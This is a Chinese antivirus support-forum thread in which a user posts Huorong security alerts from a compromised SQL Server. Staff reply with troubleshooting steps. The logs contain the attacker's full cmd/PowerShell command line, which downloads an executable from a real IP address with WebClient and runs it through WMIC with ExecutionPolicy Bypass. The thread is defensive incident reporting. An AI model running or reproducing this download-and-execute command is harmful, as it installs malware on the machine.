火绒安全软件

动态防御问题反馈
发新帖
打印 上一主题 下一主题

cmd.exe触犯应用加固规则

[复制链接]
2093 9
楼主
发表于 2022-11-3 09:45:34 | 只看该作者 |只看大图 |倒序浏览 |阅读模式
跳转到指定楼层
cmd.exe触犯应用加固规则
1】2022-11-03 08:23:40,系统防护,系统加固,cmd.exe触犯敏感动作防护规则, 已阻止

防护项目:通过WMIC启动可疑进程
执行文件:C:\Windows\System32\wbem\WMIC.exe
执行命令行:WMIC  process call create "C:\Windows\TEMP\ZE4O9H72.exe"
操作结果:已阻止

进程ID:6740
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:"C:\Windows\System32\cmd.exe" /C "echo $client = New-Object System.Net.WebClient > C:\Windows\TEMP\update.ps1 & echo $client.DownloadFile("http://80.66.75.25/arx1-Uchenmk.exe","C:\Windows\TEMP\ZE4O9H72.exe") >> C:\Windows\TEMP\update.ps1 & powershell  -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1 & WMIC process call create "C:\Windows\TEMP\ZE4O9H72.exe""
操作进程校验和:0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
父进程ID:1824
父进程:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
父进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】2022-11-03 08:23:24,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止

防护项目:数据库
操作目标:【执行】 C:\Windows\System32\wbem\WMIC.exe
操作目标参数:WMIC  process call create "C:\Windows\TEMP\ZE4O9H72.exe"
操作结果:已阻止

保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【3】2022-11-03 08:22:55,系统防护,系统加固,cmd.exe触犯敏感动作防护规则, 已阻止

防护项目:通过WMIC启动可疑进程
执行文件:C:\Windows\System32\wbem\WMIC.exe
执行命令行:WMIC  process call create "C:\Windows\TEMP\U2QWE354.exe"
操作结果:已阻止

进程ID:8144
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:"C:\Windows\system32\cmd.exe" /c "echo $client = New-Object System.Net.WebClient > %TEMP%\update.ps1 & echo $client.DownloadFile("http://80.66.75.25/arx1-Uchenmk.exe","%TEMP%\U2QWE354.exe") >> %TEMP%\update.ps1 & powershell -ExecutionPolicy Bypass %temp%\update.ps1 & WMIC process call create "%TEMP%\U2QWE354.exe""
操作进程校验和:0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
父进程ID:1824
父进程:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
父进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【4】2022-11-03 08:22:39,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止

防护项目:数据库
操作目标:【执行】 C:\Windows\System32\wbem\WMIC.exe
操作目标参数:WMIC  process call create "C:\Windows\TEMP\U2QWE354.exe"
操作结果:已阻止

保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【5】2022-11-03 08:21:54,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止

防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell   -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1
操作结果:已阻止

保护进程路径:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【6】2022-11-03 08:21:11,病毒防护,文件实时监控,发现病毒HEUR:TrojanDownloader/PowerShell.Agent.a, 已处理

病毒名称:HEUR:TrojanDownloader/PowerShell.Agent.a
病毒ID:76CE49D5BC4CB654
病毒路径:C:\Windows\Temp\update.ps1
操作类型:执行
操作结果:已处理

进程ID:5828
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行:powershell  -ExecutionPolicy Bypass C:\Windows\TEMP\update.ps1
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

回复

使用道具 举报

2093 9
沙发
发表于 2022-11-3 10:15:21 | 只看该作者
您好,此情况可能是挖矿病毒引起的,建议您先进行全盘扫描试试
回复

使用道具 举报

2093 9
板凳
发表于 2022-11-3 10:23:36 | 只看该作者
请问怎么处理?
回复

使用道具 举报

2093 9
地板
发表于 2022-11-3 10:26:07 | 只看该作者
已经全面扫描,查杀之后还是这样,请问是否有专杀工具?
回复

使用道具 举报

2093 9
5#
发表于 2022-11-3 10:27:50 | 只看该作者
zfgood123 发表于 2022-11-3 10:26
已经全面扫描,查杀之后还是这样,请问是否有专杀工具?

请您留一下QQ联系方式,这边工程师协助您排查
回复

使用道具 举报

2093 9
6#
发表于 2022-11-3 10:34:38 | 只看该作者
QQ号码393263480
回复

使用道具 举报

2093 9
7#
发表于 2022-11-3 10:39:27 | 只看该作者

已向您发送好友申请
回复

使用道具 举报

2093 9
8#
发表于 2022-11-3 10:48:57 | 只看该作者
好的,谢谢,现在还没收到
回复

使用道具 举报

2093 9
9#
发表于 2022-11-3 10:51:25 | 只看该作者
zfgood123 发表于 2022-11-3 10:48
好的,谢谢,现在还没收到

若未收到申请麻烦您微信扫码添加运营

40498854-39cf-4dac-bc74-2550e755470a.jpg (23.4 KB, 下载次数: 1010)

40498854-39cf-4dac-bc74-2550e755470a.jpg
回复

使用道具 举报

2093 9
10#
发表于 2022-11-15 17:53:16 | 只看该作者
经确认您的问题已解决,感谢您的反馈
回复

使用道具 举报

您需要登录后才可以回帖 登录 | [立即注册]

本版积分规则

快速回复 返回顶部 返回列表